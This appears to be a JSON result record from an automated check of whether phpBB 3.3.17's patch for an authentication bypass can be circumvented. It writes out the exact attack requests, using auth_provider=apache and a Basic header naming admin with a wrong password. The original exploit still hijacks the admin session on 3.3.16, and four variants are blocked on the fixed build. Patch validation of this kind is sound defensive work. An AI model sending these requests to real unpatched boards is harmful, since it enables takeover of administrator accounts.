{
  "variant_outcome": "no_bypass_found",
  "claim_outcome": "not_confirmed",
  "claim_block_reason": "no_bypass_found",
  "bypass_reproduced_on_fixed": false,
  "variant_reproduced_on_vulnerable": false,
  "validated_surface": "api_remote",
  "evidence_scope": "production_path",
  "claimed_impact_class": "authz_bypass",
  "observed_impact_class": "authz_bypass",
  "exploitability_confidence": "high",
  "attacker_controlled_input": "auth_provider=apache request parameter (GET/POST) plus HTTP Basic Authorization header (PHP_AUTH_USER set to an existing username, e.g. admin); password deliberately wrong (x). Register-flow candidate additionally supplies login_link_* POST data and registration fields.",
  "tested_variants": [
    {
      "id": "V1",
      "name": "register-flow residual attacker-steerable get_provider(auth_provider)",
      "entrypoint": "POST ucp.php?mode=register&auth_provider=apache (+ login_link_* POST + registration fields)",
      "code_path": "includes/ucp/ucp_register.php ~line 120 -> get_provider($request->variable('auth_provider','')) -> login_link_has_necessary_data() + link_account() (NO ->login() call)",
      "fixed_result": "blocked",
      "fixed_session_u": "1",
      "vulnerable_result": "blocked",
      "vulnerable_session_u": "1",
      "is_bypass": false,
      "note": "Residual anti-pattern the fix did not touch; but register flow never calls ->login() on the selected provider and only session_create()s the NEW user, so the password-less apache sink is unreachable. Not a variant of the auth-bypass on either version."
    },
    {
      "id": "V2",
      "name": "auth_provider forwarded through login_link redirect",
      "entrypoint": "POST ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1",
      "code_path": "ucp.php case login_link -> phpbb_redirect_to_controller forwards all GET params -> oauth::link_account() get_provider() NO arg (auth_provider ignored)",
      "fixed_result": "blocked",
      "fixed_session_u": "1",
      "fixed_response_first_line": "HTTP/1.0 301 Moved Permanently",
      "is_bypass": false
    },
    {
      "id": "V3",
      "name": "direct controller link_account with auth_provider=apache in query",
      "entrypoint": "POST /app.php/user/oauth/link_account?auth_provider=apache&login_link_aikido=1 (+ Authorization: Basic admin:x)",
      "code_path": "oauth::link_account() -> get_provider() NO arg -> db::login('admin','x') -> password hash mismatch -> rejected",
      "fixed_result": "blocked",
      "fixed_session_u": "1",
      "fixed_error_block_count": 1,
      "is_bypass": false,
      "note": "Controller never reads auth_provider; uses board-configured db provider; wrong password rejected."
    },
    {
      "id": "V4",
      "name": "oauth login controller with Basic header",
      "entrypoint": "GET /app.php/user/oauth/login/apache (+ Authorization: Basic admin:x)",
      "code_path": "oauth::login('apache') -> get_provider() NO arg -> instanceof phpbb\\auth\\provider\\oauth\\oauth guard -> throws HTTP 401",
      "fixed_result": "blocked",
      "fixed_session_u": "1",
      "fixed_response_first_line": "HTTP/1.1 401 Unauthorized",
      "is_bypass": false
    },
    {
      "id": "V5",
      "name": "original exploit (control)",
      "entrypoint": "POST ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1 (+ Authorization: Basic admin:x)",
      "code_path": "3.3.16 ucp_login_link::main() get_provider(auth_provider) -> apache::login() LOGIN_SUCCESS -> session_create(admin user_id=2)",
      "vulnerable_result": "hijack",
      "vulnerable_session_u": "2",
      "vulnerable_acp_link_count": 2,
      "fixed_result_ucp_path": "blocked",
      "fixed_result_controller_path": "blocked",
      "fixed_session_u": "1",
      "is_bypass": false,
      "note": "Confirms test harness reaches the real Apache+mod_php boundary; 3.3.16 still hijacks admin, 3.3.17 blocks the original exploit."
    }
  ],
  "trigger_path": "No trigger path on the fixed build reaches the password-less apache::login() sink. The only residual attacker-steerable get_provider(auth_provider) (ucp_register.php) is not followed by ->login()+session_create() for an existing user. Every request-facing get_provider() that IS followed by ->login() passes no argument (configured auth_method).",
  "end_to_end_target_reached": true,
  "sanitizer_used": false,
  "crash_observed": false,
  "read_write_primitive_observed": false,
  "exploit_chain_demonstrated": false,
  "blocking_mitigation": "phpBB 3.3.17 fix (ticket/17659): login-link flow moved to phpbb/ucp/controller/oauth.php which resolves the provider via get_provider() with NO argument (board-configured auth_method, default db); the password-less apache provider is therefore unreachable from request-steered provider selection; the oauth login() controller is additionally guarded by instanceof phpbb\\auth\\provider\\oauth\\oauth.",
  "inferred": false,
  "runtime_manifest_present": true,
  "source_identity_present": true,
  "tested_vulnerable_commit": "555f0aaa6b892efb2e6b6edd2362302a3ef8b339",
  "tested_fixed_commit": "3508484fdc18cd97eeab229da830055c79fcc59e"
}
